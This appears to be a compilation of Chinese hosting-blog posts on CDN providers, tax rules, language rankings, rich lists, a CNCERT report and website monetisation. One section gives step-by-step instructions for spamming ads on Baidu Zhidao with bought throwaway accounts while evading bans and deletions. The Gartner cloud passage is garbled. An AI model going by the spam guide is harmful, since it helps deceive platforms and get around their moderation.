腾讯云CDN是腾讯云推出的一款网站加速CDN,是一款纯加速产品,国内节点比较多,每个域名可以分配到30个左右的节点,每个用户每月送10G流量包,对于一般的企业网站是够用的,当然如果你流量上来了,得买流量包了。需要注意的是腾讯云CDN是不带防护的,所以一但被攻击极有可能会严重消耗流量,而腾讯云的帐号是可以透支的,会出现帐户欠费的情况,曾经有一位站长就是被攻击一天欠了几千块钱,所以使用的时候一定要设置好每天使用量,以免造成不必要的麻烦。还要腾讯云HTTPS请求是收费的,HTTPS网站慎用了,细算下收费还是挺高的。 4、又拍云CDN 又拍云CDN是一个优秀的数据云存储和云分发平台,成立时间早于七牛云存储,在客户数量及口碑上都有不错的市场反馈,再加上高质量的图片存储服务,许多站长都对又拍云存储青睐有加。新用户在又拍云上每月有10GB空间及15GB流量,老用户则有18GB 流量。但是在你使用又拍云的免费CDN功能时,必须在博客或网站上添加一个指向又拍云的链接或者Logo,还是跟腾讯云一样,HTTPS请求是收费的。 5、奇安信网站卫士 奇安信网站卫士前身是360网站卫士,集成网页加速功能,可防止CC、DDos攻击,本身以安全为首任的360,其CDN商品也声称具有防跨站、防注入、防篡改,防挂马等功能,其实跟百度云加速差不多,不过节点比较少,目测只有3个左右,曾经挺多人用的,目前用的人少了,主要是因为网站卫士已经多年没有更新过了。 6、加速乐 加速乐是知道创宇推出的防御DDOS攻击,CC攻击,网站加速一体的CDN产品。免费版月流量3600G, 只支持纯加速,如果要防御的话还得购买抗D宝等产品,价格还是挺贵的,并且免费版不支持HTTPS,总体来说不如百度云加速免费版的好,不过如果你不想用百度云加速的话倒是不错的选择。   以上就是主机吧目前能找到的比较靠谱的免费CDN服务商,大家且行且珍惜吧,互联网服务虽然是免费分享起家,但目前收费已经成了主流了,连阅读现在都要收费了,更别提这些互联网基础服务了。 #### 2019年税务法更新详细介绍 快来看看吧 2019年1月1日起,一批新的法律法规将要实施,这些新的法律法规将会对你我的生活产生重大影响。微信朋友圈、直播等方式卖货属于电子商务经营者经过5年的审议,《中华人民共和国电子商务法》正式通过,并将于2019年1月1日起施行。新法规第九条对电子商务经营者作了明确规定,即指通过互联网等信息网络从事销售商品或者提供服务的经营活动自然人、法人和非法人组织,包括电子商务平台经营者、平台内经营者以及通过自建网站、其他网络服务销售商品或者提供服务的电子商务经营者。这就是说,淘宝、京东等电商平台上的代购,微信朋友圈里的微商、以及在网络直播平台中卖东西的主播,都属于电子商务经营者。这些人都需要执有营业执照,还须是采购国和中国双方的营业执照;需要缴纳税务,偷税漏税需承担刑事责任。此外,新规明确规定,没有中文标签、不是国家认监委认证工厂生产、未获取配方注册证的婴幼儿配方奶粉不得在网络平台销售。对于消费者来说,《中华人民共和国电子商务法》进一步规范了电商代购的行为,为消费者打造了一个更好的消费环境。跨境电商新政正式实施 个人额度提升至2.6万元对于喜欢海淘的消费者来说,元旦将迎来一波福利。2019年1月1日起,财政部、海关总署与税务总局联合发布《关于完善跨境电子商务零售进口监管有关工作的通知》将正式实施。新政将跨境电子商务零售进口商品的单次交易限值由人民币2000元提高至5000元,年度交易限值则提高至26000元;同时,将单次交易限值由每人每次2000元调整至5000元。在商品清单方面,新政将部分近年来消费需求比较旺盛的商品纳入清单范围,增加了葡萄汽酒、麦芽酿造啤酒、健身器材等63个税目商品,同时,还对前两批清单进行了技术性调整和更新,调整后的清单共1321个税目。这意味着,消费者可选择的产品更广,跨境电商消费体验更好,更多品质化、多元化消费需求将得到满足。社会保险费交由税务部门统一征收根据《国税地税征管体制改革方案》,从2019年1月1日起,将基本养老保险费、基本医疗保险费、失业保险费、工伤保险费、生育保险费等各项社会保险费交由税务部门统一征收。这意味着那些不给员工上社保,或者不给员工全额上社保的行为将有望得到改变,员工个人权益将更有保障。个税六项支出将首次作为专项附加扣除12月22日,国务院印发《个人所得税专项附加扣除暂行办法》,子女教育、继续教育、大病医疗、住房贷款利息、住房租金、赡养老人六项支出将首次作为专项附加扣除。《个人所得税专项附加扣除暂行办法》将自2019年1月1日实施。这就是说,那些上有老下有小的家庭,今后纳税人计算个税应纳税所得额,在5000元基本减除费用扣除和“三险一金”等专项扣除外,还可享受上述6项专项附加扣除。各项专项附加扣除的具体扣除规定如下:三大运营商提供手机异地销号服务12月初,据新华社报道,针对用户反映的手机卡异地销户难的问题,工信部要求三大基础电信企业2019年1月1日起在全国正式提供手机异地销户服务。根据报道,目前部分地区的运营商正在逐步试点开设手机号异地销户业务。中国移动、中国电信部分营业厅已经可以代用户申请办理异地销户,但不能当场办理,仍需要等待数天,且最终能否成功办理并不一定。中国联通部分地区则采用手机营业厅方式办理相关业务。(周小白) #### 2019扫黄打非:已将软色情等低俗广告营销纳入低俗信息专项整治内容 4月24日 消息:日前,杜蕾斯和喜茶等互动文案引发了不少网友争议,在不少网友看来,该文案显得太low了。全国“扫黄打非”办公室官方对该类广告作出评论表示,已将低俗广告营销等此类问题纳入当前正在开展的网上低俗信息专项整治内容。 全国“扫黄打非”办公室表示,近几年,低俗广告营销屡见不鲜,其手法总是一成不变的性暗示、消费女性、性别歧视。这种软色情行为,其危害一定程度上甚至比真正的色情更可怕。软色情经常在法律边缘游离,流窜于网上网下多类公共平台,裹挟了一个个孩子,冲击着他们的心理防线和道德底线。 全国“扫黄打非”办公室称,已将此类问题纳入当前正在开展的网上低俗信息专项整治内容,督促和指导各大网络平台加强自律,建立标准,设立底线,进一步健全审核机制和加大审核力度,严把内容关;并协调组织有关部门对低俗内容及时清理封堵,对相关企业采取约谈、责令整改、行政处罚等措施,对重点企业实施重点监管,坚决整治低俗内容传播,为青少年健康成长营造清朗网络空间和良好社会环境。 #### 2019最受欢迎的编程语言Python连续夺冠、PHP 受排挤 IEEE Spectrum 编程语言排行榜一年发布一次,这个排行榜已经连续发布了六年。每个开发者都需要相对流行的网站统计数据,与其他的语言排行榜不同,IEEE Spectrum 可以让开发者自己选择参数组合时的权重,得到多样的排序结果。 而且 IEEE Spectrum 今年进行了重大改革,针对求职者内置了一些预设的权重,改变了一些基础指标,从 8 个数据源的 11 个指标中获取数据。程序员还可以应用筛选器,以排除不感兴趣的领域编程语言,这样一来,结果会显得更鲜明。但是,基本的思想和方法仍然相同:将多个来源的数据组合起来,对编程语言的流行程度进行排名。 那么下面,让我们看看今年的排名是怎样的,流行的趋势又是否有所变化呢? IEEE Spectrum 2019 十大编程语言排行如下: Python稳居榜首,且连续夺冠三年 尽管基本指标有所变化,但总体的结果仍然相似,Python 始终处于领先地位。Python 的流行在很大程度上是受了大量可用专用库的驱动,特别是在人工智能领域中。事实上,Keras 库对深度学习开发人员影响很大。但是深入学习并不是Python 产生巨大的影响的唯一领域,微处理器计算能力的显著提高意味着嵌入式版本的 Python:如 CircuitPython 和 MicroPython,正越来越受制造商的欢迎。 而 Python 为何能连续三年夺冠? Python 的高速发展主要原因是软件工程的蓬勃发展,它吸引了许多零基础的初学者。Java 的编程方法对于初学者来说太冗长了,单单想要完全理解和运行在 Java 中的“hello world”这样的简单程序,你就需要去了解类、静态方法和包。在 C 语言中,这要简单一些,但是在内存管理上还是会出现一些问题。但在 Python 这里,就只是一行代码的事。所以,Python 越来越流行,被越来越多的开发者使用。 Java、C 和 C++ 的战局 排在二三四名的是 Java、C 和 C++,这个小组的成员长期互相争斗,无论在哪个排行榜都是你来我往,但都被Python稳压一头。而且在调整了指标后,这之间的距离有所扩大,C++比Python低了12.5。而Java从去年的第四名回升到了第二名,三者的排名和去年的刚好相反。 那么 Java 为什么依然能荣登第二呢? 第一,Java 语言依然是被最广泛使用的编程语言之一。目前 Java 语言在 Web 开发领域、Android 开发领域、大数据开发领域以及各种后端服务开发领域都有广泛的用户基础,可以说 Java 语言的生态环境已经比较健全了,这种情况下,采用 Java 语言将会明显降低程序开发的风险,因此 Java 语言将依然是软件团队最为常见的选择之一。 第二,随着 5G 标准的逐渐落地,未来物联网的发展将会迎来更多的机会,而物联网的发展必将带动大数据、云计算、人工智能领域的发展,而 Java 在这些领域都有比较广泛的应用,所以未来 Java 语言在产业互联网阶段,也会有比较普遍的应用。 如下是去年 TOP 10 排名: Swift冲至第九名! 对比去年的榜单,PHP 在前十的排名中已经不见踪影,Go 则下跌了一个名次。 另外,去年不在榜单上的 Swift,今年冲到了第九名,这是为何? Swift 是由苹果创建的强大而直观的编程语言,它的使命是用于构建苹果体系内的应用程序。而且Swift 可以在苹果体系内的所有平台上构建应用程序,诸如iOS、Mac、Apple TV 和 Apple Watch。 苹果公司为了顺应时代于 2014 年推出了 Swift 语言,目前已经是第四个版本了。Swift 优势在于融合了现代语言特性,是一门非常容易学习的语言。而且经过这 5 年发展,Swift 生态圈基本成熟,目前有大量的开源代码可供使用。 而且,2019 年 WWDC 大会上,苹果在压轴环节向大众宣布了基于 Swift 语言构建的全新 UI 框架 —— SwiftUI。开发者可通过它快速为所有的 Apple 平台创建美观、动态的应用程序。在介绍过程中,苹果公司软件工程高级副总裁 Craig Federighi 演示了如何将一百行代码简化为大约十几行。 从以上的信息可以看出 Swift 的发展趋势,而今年的排行榜也证明了这一点。 R 语言为何能上升? 数字运算语言 R 今年排名第五,比去年上升了两名,尽管它是一种比其他语言更专业的语言,但伴随着越来越多的大数据,近年来一直保持着它的流行度。 虽说 R 语言常年被 Python 打压,可仍然比去年提升了两名,这要得益于它的几个特性: 命令模式。Python 虽然也支持命令模式,但是相对来说,更偏向于流程控制语句。R 本身基本上不需要用到流程控制(当然,它也支持流程控制)。 交互性。这是命令模式的一个特点,敲回车,出结果,但是又不像 SPSS那种用鼠标扎针的交互方式。 统计学特性。这是 R 语言最大的特点,比如: 赋值的时候,不用等号(=),用的是指向(<-),带来的问题就是要写 a < -5 这种语句,就需要 a < (-5)  这样写。 其他编程语言排名 正如文章开头所述,除了默认的权重产生的排行榜之外,IEEE Spectrum 还提供了用户增速趋势、就业需求、开源、自定义这四个选项,开发者可根据自身需求或兴趣查看排行榜。 IEEE Spectrum 完整的排行榜:Matlab 位居第八,Fortran38 位 位居第八,由 MathWorks 开发并用于数值计算的专有语言 Matlab 的出现可能让一些人惊讶,它反映了该语言在硬件工程中的突出地位,特别是对于那些对运行模拟感兴趣或者通过 MathWorks 的图形 Simulink 包创建控制系统的用户。 在前 10 名之下,有一些值得注意的,尤其是 Fortran,尽管已有 60 多年的历史,仍然排在第38 位,可见原始科学计算语言依然具有巨大的传统力量。并且,随着 2018 年最新 Fortran 标准的发布,该语言仍在积极开发中。 用户增速编程语言排行榜:JavaScript上升 随着 Nodejs 的大面积使用,前端开发后端化是一个较为明显的趋势,JavaScript 正在从传统的前端开发走向后端开发,这对 Java 语言的应用也会造成一定的影响。目前 JavaScript 的开源项目非常多,这在一定程度上也促进了 JavaScript 的应用和发展,所以对于 Java 程序员来说,未来掌握JavaScript 也是有一定必要的。 就业需求编程语言排行榜:PHP下滑 AI和大数据时代的趋势很大,Python 开发者人数正在增加,人工智能时代 PHP确实有点尴尬,导致很多人各种原因转了 Python, 10~15 年后还有多少 PHP 开发者不得而知,或者 PHP 找到了新的切入点,就像沉默了几十年的Python 如今找到了自己的归属地一样,需要时间来检验。 开源编程语言排行榜:Python、Java、C、C++ 位置依然坚挺 该排行榜中,前四名相对去年排名并没有变化,依旧是 Python、Java、C、C++。其中 Java 上升了一位,排名第二;其次,素有世界上最好编程语言之称的 PHP 下降至11 名。 值得一提的是 JavaScript 上升了 3 名,现在是第五名。 更多详细内容详见 IEEE Spectrum 官网: https://spectrum.ieee.org/computing/software/the-top-programming-languages-2019 #### 2019最新简单百度知道引流百度推广技巧 没有什么项目是流量搞不定的,哪怕转化率与客单价低到尘埃,那就再加一点流量。所以引流技术你得恶补,打工狗学了引流技术接触的客户更多升职加薪,创业仔学了引流技术就教给打工狗然后在办公室抽烟傻乐。做互联网创业之前,我们总会遇到新手期,我做的第一份互联网差事,就是推广一款监控器APP,把黄页网站上的手机号码,一个一个粘贴下来,敲在微信搜索栏上添加好友。1个月时间还真他娘推出了几位付费用户。后来,操作的引流项目多起来,也更清楚其中乾坤,但简单有效的引流技巧我仍然推荐百度知道引流。它离你的用户更近,它让引流成本降低,成交率也好的离谱。举个例子,你想通过送资料吸引大量泛粉。再举一个,你想一单吃一年,直接留电话号码,一单下来几十万起步。唯一难受的地方就是你可能会有以下问题:我刚注册的新号上去回答问题就被删掉了,等级高的账号又太贵,如果不养号可以留下我的广告吗?1.搞几个5毛钱的小号登录百度知道。(购买地址:百度一下百度小号)2.先加入一个团队,打开下面的网址,随即加入1个团队。3.打开我的回答,现在可以签到了。https://zhidao.baidu.com/ihome/homepage/myanwser4.打开问题分类,添加几个标签,随便添加几个。https://zhidao.baidu.com/list?fr=daohang5.领取任务https://zhidao.baidu.com/ihome/homepage/mytask6.开启百度知道升级任务7.在团里回答两个正常问题,发一个你要回答的广告,再回答三个正常问题,再发一个广告,如此往复,一个号一天最多回答3到5个广告即可。多发,第二天封号,删贴。有几个需要啰嗦的地方:一般一个账号只使用一天,就是回答3到5个广告。之后,不管封与不封,不再使用,目的是保护你之前发的广告不掉。如果想省钱,三天以后如果不封,再使用。(有风险)如果发链接秒删,可以先回答正常内容,过两分钟,再修改回答加链接。如果二次回答也秒,那这个号不行了。浏览器多装几个换着用,别老用一个浏览器发贴,百度会抓你的。一号一IP一浏览器,换号要清理cookie...发的链接最好后面加变量,比如“http://www.baidu.com?kjdfows567” 在网址最后面加。”?kjdfows567”已经写的很详细了,失败了就多看几遍,别想一次成功。总结:小白玩网络,真的就只有一条网线,没项目没技术没资源,所以要选择入门的项目来练技术、攒资源,小菜鸟升老司机。借用马云的一句话,我曾见过捕虾致富的,没见过捕鲸鱼致富的。学会先引淘金流量,再卖铲子赚钱。作者:老狮 公众号:老狮日记 #### 2019百度搜索将严厉打击虚假诈骗等违法违规信息 为了维护安全健康的搜索生态,保障搜索用户的合法权益,百度搜索严厉打击电信网络中的虚假诈骗、违法交易、黄赌毒等违法违规信息。 百度搜索打击的违法违规信息包括但不限于以下内容: 一、虚假、诈骗类信息: 1、仿冒政府/企业官网、伪造政府/企业联系方式等,或恶意传播相关虚假信息; 2、售卖或传播诈骗相关的书籍、手法、工具,宣传不正当获利手段; 二、违法交易类信息: 1、伪造证件:如伪造驾照、身份证、结婚证、银行卡等; 2、恶意套现交易:如花呗套现、白条套现等; 3、学术不端:如代发论文、代写论文等; 4、私家侦探:不符合国家法律规定,恶意探究他人隐私,侵犯他人隐私权等; 5、违法贷款:未取得政府认可,进行无抵押贷款、黑户贷款、裸贷等; 6、违规软件:恶意提供软件破解版、游戏外挂、刷赞/刷粉等作弊工具软件; 7、违规兼职网赚:发布刷单、打字等欺诈类兼职或违法灰色网赚信息,导致网络用户财产受损; 三、黄赌毒信息: 1、恶意传播色情淫秽内容或擦边信息; 2、恶意传播非国家认可的彩种信息,引导大众赌博,如时时彩等; 3、恶意传播赌博微信群、赌博工具、聚众赌博地点等非法内容。 对于以上内容,如果您有任何问题,欢迎通过反馈中心联系我们。 #### 2019胡润全球富豪榜:马云成华人首富 资产2600亿元 新浪科技讯2 月 26 日下午消息,胡润研究院发布《 2019 胡润全球富豪榜》,来自 67 个国家、 1931 家公司的 2470 名十亿美金富豪上榜。其中,亚马逊CEO杰夫•贝索斯以 9900 亿人民币蝉联世界首富,马云以 2600 亿元成为全球华人首富,马化腾和许家印紧随其后。 以下为《 2019 胡润全球富豪榜》部分内容: 430 位富豪跌出胡润全球富豪榜,创历史最高纪录。中国落榜 212 人,印度 52 人 201 张新面孔上榜,中国和美国以 52 人和 39 人居首 全球共有 2470 位十亿美金富豪,比去年减少 224 位。总财富下降 1 万亿美元 亚马逊 55 岁的杰夫•贝佐斯财富增加 2150 亿,以 9900 亿人民币蝉联世界首富 中国以 658 位十亿美金富豪位居世界第一,比美国的 584 位多 74 位;其次是德国、英国和印度 尽管Facebook和谷歌这一年处境艰难,扎克伯格、谢尔盖•布林和拉里•佩奇都进入前十名 马云以 2600 亿元成为全球华人首富,上升 4 位到第 22 位;马化腾和许家印紧随其后 奢侈品行业顶住了经济放缓的影响,实现强劲增长,其中LVMH的伯纳德•阿诺特财富增长10%,以 5800 亿元位列第四 SpaceX估值上升推动埃隆•马斯克以 1900 亿元财富跃升 10 位,至第 30 位 北京连续第四年成为“世界十亿美金富豪之都”,比纽约多 11 人 40 岁王兴的美团点评和 50 岁雷军的小米上市首日市值 500 亿美元。其他大型IPO还包括瑞典 49 岁Martin Lorentzon的音乐平台Spotify,美国 35 岁Andrew Houston的云储存公司Dropbox和 66 岁Najeeb Al-Humaidhi的阿斯顿•马丁 亚洲首富是首次跻身全球前十的印度能源大王安巴尼,财富增长20%,达到 3700 亿元 科技行业仍是最主要财富来源,其次是房地产、投资、制造业和零售业。前五大行业的人数占据了榜单的一半。酒店业和大健康行业今年表现不错 区块链是增长最快的新兴行业,有 5 位上榜,以中国比特大陆 40 岁的詹克团为首,财富 185 亿元,其次是瑞波币创始人Chris Larsen,财富 110 亿元 #### 2020/7/23百度云加速IP段节点更新通知 尊敬的百度云加速用户,我们已新增以下节点,请大家注意更新防火墙白名单,谢谢! 黄石电信 111.174.61.128/25 石家庄联通 220.195.22.0/24 重庆电信 119.84.93.0/24 福州电信 117.27.149.128/25 青岛联通 119.167.246.128/25 杭州移动 112.13.72.0/24 佛山电信 116.31.127.0/24 无锡移动 112.25.90.128/25 合肥移动 112.29.158.0/24 宁波电信 115.231.186.128/25 天津电信 42.81.8.128/25 济南联通 119.188.9.128/25 西安电信 117.34.61.0/24 湖州联通 61.241.118.0/24 百度云加速全部IP段地址 https://su.baidu.com/help/index.html#/10_changjianwenti/0_HIDE_FAQ/20_baiduyunjiasujiedianIPdizhiduan.md #### 2020一季度24家企业被纳入电信业务经营不良名单 景安网络和西部数码上榜 4月14日 消息:今日,工信部公布了《2020一季度被纳入电信业务经营不良名单》. 工信部称, 2020 年一季度,依据《电信条例》《电信业务经营许可管理办法》等相关规定, 24 家企业因无正当理由中止对电信用户的电信服务、接入未备案网站、违反实名制规定、不配合调查等违法违规行为,受到电信管理机构行政处罚并被纳入电信业务经营不良名单。 据名单显示,其中,三大运营商旗下多家分公司在内。 #### 2020年中国互联网网络安全报告全文:勒索病毒活跃,网站攻击减少 国家计算机网络应急技术处理协调中心(CNCERT/CC)编写的《2020 年中国互联网网络安全报告》正式发布。该中心自从 2008 年起,便持续编写发布中国互联网网络安全年度报告,依托 CNCERT 多年来从事网络安全监测、预警和应急处置等工作的实际情况,对我国互联网网络安全状况进行总体判断和趋势分析,具有重要的参考价值。 《2020 年中国互联网网络安全报告》 汇总分析了 CNCERT/CC 自有网络安全监测数据和 CNCERT/CC 网络安全应急服务支撑单位报送的数据,具有鲜明的行业特色和重要的参考价值,内容涵盖我国互联网网络安全态势分析、网络安全监测数据分析、网络安全事件案例详解、网络安全政策和技术动态等多个方面。其中,本报告对计算机恶意程序传播和活动、移动互联网恶意程序传播和活动、网站安全监测、DDoS 攻击监测、 信息安全漏洞通报与处置、网络安全事件接收与处置等情况进行 深入细致的分析,并对 2020 年的典型网络安全事件进行专题介 绍。此外,本报告还对网络安全组织发展情况和 CNCERT/CC 举办的重要网络安全会议和活动等进行了阶段性总结。最后,本报告对 2021 年网络安全关注方向进行预测。 具体来看,2020 年,CNCERT/CC 协调处置各类网络安全事件约 10.3 万起,同比减少 4.2%。据抽样监测发现,我国被植入后门网站、被篡改网站等数量均有所减少, 其中被植入后门的网站数量同比减少 37.3%,境内政府网站被植入后门的数量大幅 下降,同比减少 64.3%;被篡改的网站数量同比减少 45.9%。 报告显示,CNCERT/C 2020 年全年捕获勒索病毒软件 78.1 万余个,较 2019 年同比增长 6.8%。近年来,勒索病毒逐渐从 " 广撒网 " 转向定向攻击,表现出更强的针对性, 攻击目标主要是大型高价值机构。同时,勒索病毒的技术手段不断升级,利用漏洞 入侵过程以及随后的内网横向移动过程的自动化、集成化、模块化、组织化特点愈 发明显,攻击技术呈现快速升级趋势。勒索方式持续升级,勒索团伙将被加密文件 窃取回传,在网站或暗网数据泄露站点上公布部分或全部文件,以威胁受害者缴纳 赎金,例如我国某互联网公司就曾遭受来自勒索团伙 Maze 实施的此类攻击。 报告表示,正规平台上恶意 App 数量逐年呈下降趋势, 仿冒 App 已难以通过正规平台上架和传播,转而采用一些新的传播方式。一些不法分子制作仿冒 App 并通过分发平台生成二维码或下载链接,采取 " 定向投递 " 等方式,通过短信、社交工具等向目标人群发送二维码或下载链接,诱骗受害人下载安装。同时,还综合运用下载链接多次跳转、域名随机变化、泛域名解析等多种技术手段,规避检测。当某个仿冒 App 下载链接被处置后,立即生成新的传播链接,以达到规避检测的目的,增加了治理难度。 #### 2020年做网站还赚钱吗? 转眼2019年就过去了,2020年还有几天就到了,在这新年快来之际,主机吧再来跟大家讨论下2020年做网站还赚不赚钱? 首先做网站想赚钱,肯定是离不开搜索引擎的,而国内搜索引擎肯定是离不开百度的,那么赚不赚钱就得看百度有没有流量啦,很多人都认为百度市值不高了,肯定没落了,做网站肯定难赚钱了。 这里主机吧告诉大家一个事实,尽管百度的市值现在不高了,但是搜索引擎作为互联网的基础,其流量是不会没落的,而事实也是这样,全球网站流量排行榜百度依然排第四,所以网站不会没落。我们只要从百度那分点流量就足够我们赚的了。 当然想从百度那来流量肯定比以前难了,因为国内互联网公司已经越来越封闭了,百度也开始打造自己的内容池,跟百度对着干肯定行不通的。国内行业这么多百度不可能所有都干完,我们只需要做百度没有涉及的业务就行了。 还有一些站长想着靠广告联盟赚钱,主机吧这里可以肯定的说,广告联盟赚钱的方式已经死了。原因有几个,其1,广告联盟的点击单价已经越来越低了,一个点击才几毛钱,甚至更低的都有,其2,上面说了从百度来的流量越来越难了,要多少点击量才够支撑得起你的盈利呢?其3,国内的浏览器或者安全软件很多都默认开启广告屏蔽功能的,比如百度广告联盟就是屏蔽的首选,你几万的浏览量,估计也就只剩1万浏览量了,再换成点击率,几乎就没有了。拿什么来赚呢?估计连域名服务器费用都交不起吧。 那么做什么赚钱呢?主机吧以自己个人经验来谈想要网站赚钱主要由以下方法: 1.卖产品 不管做什么肯定是卖产品的最赚钱的,假如你有自己的产品,做网站推销引流量,转化率是非常高的,主机吧就曾遇到一个客户,就建了一个简单的博客,主要介绍自家产的茶叶,分享如何泡茶,博客流量也不高,每天大概几百IP流量这样,但是据他所说每天可以给他带来几千块的收入,有时候甚至更高,而他根本没实体店,专心种茶网上卖就好了,成本非常低,可见卖产品是可以将利润最大化的。 2.带货 如果你没有自己产品,那么网上选种一款比较火的产品,然后跟厂家谈,给他卖,然后对方再给你相应的返款。这种是当下非常流行的,跟直播带货差不多。但是我们没这么多粉丝,也没那流量,只能通过推广网站带货。像主机吧博客也是这样的套路,主机吧博客也是主要介绍百度云加速,然后卖云加速产品的。其实这类网站是相当多的,比如我们常看到的VPS评测博客,大多是代理外国VPS服务商的产品来卖的,还有一些美装博客都是,就连我们熟悉的站长之家,也开始在文章里陷入产品连接了,这就是网站带货的方式。 3.卖服务 在互联网上卖服务,比如主机吧就专门给网站做防御的,一样大量用户买,而且用户量不低。跟大家说个事实,主机吧博客成立以来,已经有不下60个黑客联系上主机吧想在主机吧博客上打广告了,而且价格给得不低,几千块一个月,只需要在博客右边栏放个推广链接,甚至设置让主机吧给他推荐用户,一个用户给30%分成,不过这种事情违法的,主机吧肯定是不能这么干的,而且我们是做防御的,给黑客找单就是给自己找麻烦。跟大家讲这些是想跟大家说,如果你有别人做不到或者很多人不会的技能,建立一个网站推广自己的服务是完全有钱赚的。前面的说的黑客违法的,我们来说不违法的,比如主机吧就见到一个专门帮人家网站搬家的,木马清除的,一个月就接40几单,家里装了几台电脑,专门是帮一些网站搬家用的。还有一些专门搞培训的,卖教程,一个教程几百上千不等,当然卖服务肯定是要些技术的,门槛应该是最高的了。 做网站最主要是兴趣,如果让你对着你做的网站每天保持更新,内容不断,一个月你可以坚持,一年呢?如果你没有兴趣,对这个非常反感的话,做不久就你放弃了。而我们一定要把兴趣变成钱,没有钱一切都是浮云,兴趣可以让你坚持,钱可以让你保持兴趣,没钱谁有空折腾网站哈,域名服务器钱一年也一两千块,还有维护网站的成本也不低的。总之只要肯坚持,网站赚钱不是难事,主机吧一直认为做网站赚钱的几率远比其它行业高,主机吧接触的站长来说,起码有3成是赚钱的,而且赚得非常多,做网站就是要么很赚钱,要么不赚钱。 大家别看近几年流行的什么新媒体,视频创业之类的,你可以去看看那些公众号,几乎都是没做几年就停更了,视频创业倒得更快,没有新梗只能跟风别人,慢慢就淘汰了,以主机吧关注的抖音博主为例,已经有7成没有更新过了,我们看到的那些粉丝多的帐号大多是一个团队的,牛B的人很少,抖音里刷来刷去就那几个人的视频比较火,其它的都是没人看的,都是金字塔游戏,当然你觉得你是金字塔上的人也可以尝试一把。     #### 2020年全国开展「扫黄打非·新风」集中行动对网络涉黄等大扫除 据新华网消息,为回应广大群众对于加强清理整治网上有害内容的呼声,4 月至 11 月全国组织开展「扫黄打非·新风」集中行动,扫除文化垃圾,持续净化社会文化环境,助力各地复工复产复学。 据介绍,集中行动以互联网为主战场,深入推进「净网 2020」「护苗 2020」「秋风 2020」专项行动,对网络淫秽色情信息、非法有害少儿出版物及信息、新闻敲诈和假媒体假记者站假记者、侵权盗版等四类问题进行「大排查」「大扫除」。 #### 2020年全球公有云服务排行榜:亚马逊、微软、阿里云前三,Google华为紧随其后 7月1日消息:据市场研究机构Gartner本周公布的2020年全球基础设施即服务(Infrastructure as a Service,IaaS)的市场调查报告显示,去年该领域的市场规模比2019年成长了40.7%,达到643亿美元,前五大服务供应商依序是、Google及亚马逊、微软、阿里云华为,而且这前5大厂商在IaaS市场的占有率便高达80%。 Gartner研究副总裁Sid Nag指出,除了因疫情推动了IaaS市场的成长以外,这些超大型的服务供应商持续扩建它们的分散式云端与边缘解决方案,进一步将公有云的触角延伸到私有云及就地部署。在2020年的表现上,亚马逊的IaaS公有云营收达到262亿美元,市占率高达40.8%,其次是微软的127亿美元,市占率为19.7%,排名第三的阿里巴巴也以61亿美元的营收取得9.5%的市占率。至于Google只排名第四,在去年的营收为39亿美元,仅占市场的6.1%。 值得注意的是,在前五大厂商中,亚马逊在去年的成长率是最低的,比起2019年,亚马逊仅成长28.7%,但微软、阿里巴巴与Google都分别有59.2%、52.8%及66.1%的成长。然而成长最快是排名第五的华为,华为2020年的IaaS营收为27亿美元,市占率仅有4.2%,但华为去年的成长幅度高达202.8%,首次挤进前五名。 #### 2020年数据库流行度排行:MySQL成事实王者,华为openGauss引期待 2020 年 4 月号 DB-Engines 数据库流行度排行出炉。在本月的排行榜上,Oracle 较上月微涨 4.78 分,MySQL 微涨 8.62 分,甲骨文公司成为最大赢家。而微软的两个产品 Microsoft SQL Server 下降 14.43 分,Microsoft Access 下降 3. 22 分,微软成数据库本月的最大输家。 此外,我们可以注意到 Microsoft Access 的积分为 121.92 和 排在后面的 Cassandra 仅仅相差1.8 分, 在本年度 Access 很有可能会跌出前 10 位。在排行榜上另外一个不容忽视的力量是 MariaDB ,这一支 MySQL 的独特力量,已经上升到第 12 的位置。如果把 MariaDB 和 MySQL 合计计算,其总分(1268.35 + 89.90 = 1358.25)已经超过了 Oracle 13 分,毫无疑问,事实上 MySQL 已经是最为流行的数据库了。再来看一下墨天轮的国产数据库排行榜,在国产数据库中,前十名如图所示。TiDB、OceanBase、达梦数据库、GaussDB、PolarDB 位列前五位,其中 TiDB 增长显著,从 20 位跃升至总榜的第 18 位,OceanBase 上升 2 位至 22 位,而本月 GaussDB 同样获得了显著增长,上升一位位居第四,达梦数据库下降一位处于第三: 在国产数据库中,来自于阿里巴巴体系的 OceanBase 和 PolarDB ,占据前五的两个席位,是国产数据库力量中,最为显著的领先玩家。从国外来看,最近一个月,国外又陷入了新冠疫情的灾难之中,技术和就业都将不可避免的受到影响,按照计划 Oracle 将在4 月 发布 Oracle Database 20c 的公开版本,这将带动一轮新的技术升级和传播热点。而在国内,华为的 GaussDB 开源计划 openGauss 即将会在近期发布,也将在技术领域引发国产数据库的热切关注。 2020 年的数据库领域,必将是不平凡的一年!以下是 DB-Engines 上的关系型数据库前 10 位: 以下是 DB-Engines 上的 Key-Value 数据库存储前 10 位: 以下是 DB-Engines 上的 文档类 数据库存储前 10 位产品: 以下是 DB-Engines 上的 图数据库存储前 10 位产品: 数据库的世界,精彩永不落幕! #### 2020年有哪些靠谱的虚拟主机服务商 虚拟主机一直都是网站建设中比较受欢迎的产品,其主要优势是:价格便宜、操作方便、免维护。缺点是:资源共享、安全性差。 随着云服务器的普及,虚拟主机已经不再是网站建设的第一选择了,而且由于国内网络服务商的格局正在变化,已经演变成大鱼吃小鱼的格局了,很多虚拟主机服务商要么倒闭,要么已经成为阿里云、腾讯云的代理,主机吧就曾买过一个虚拟主机,不到半年这家虚拟主机服务商就跑路了,资料也没取回来,所以我们在选择虚拟主机服务商的时候一定要慎重,今天主机吧就来盘点当下国内有哪些靠谱的虚拟主机服务商,国外就不要考虑了,以主机吧的经验来说,国外都不靠谱,因为售后相当困难,而且他们是非常遵守工作时间的,没到点都不会出现,24小时售后在国外简直是笑话。 1.阿里云虚拟主机 阿里云不愧是国内云服务的龙头老大,不管理云服务器还是虚拟主机,绝对是国内排第一的,其虚拟主机速度快,稳定,价格也不贵,而且内存CPU独享,还是独立IP,完美解决了上面说的缺点。 不过其缺点还是有的,CPU核数给的小,最高给2核,这点是肯定运行不了什么大站的,而且由于是在独立IP,一但被人家攻击了,那只能进黑洞处理了,阿里云虚拟主机是没防的。 2.百度云虚拟主机 百度云虚拟主机是主机吧知道的大厂中唯一一家支持月付的虚拟主机服务商,价格非常便宜,与阿里云不同的是百度云是共享IP,由百度国内多个节点组成,相当于CDN,好处是可以防攻击,不像阿里,独立IP挂了,那就真的打不开了。百度云还提供高防商务型,最大支持100Gbps 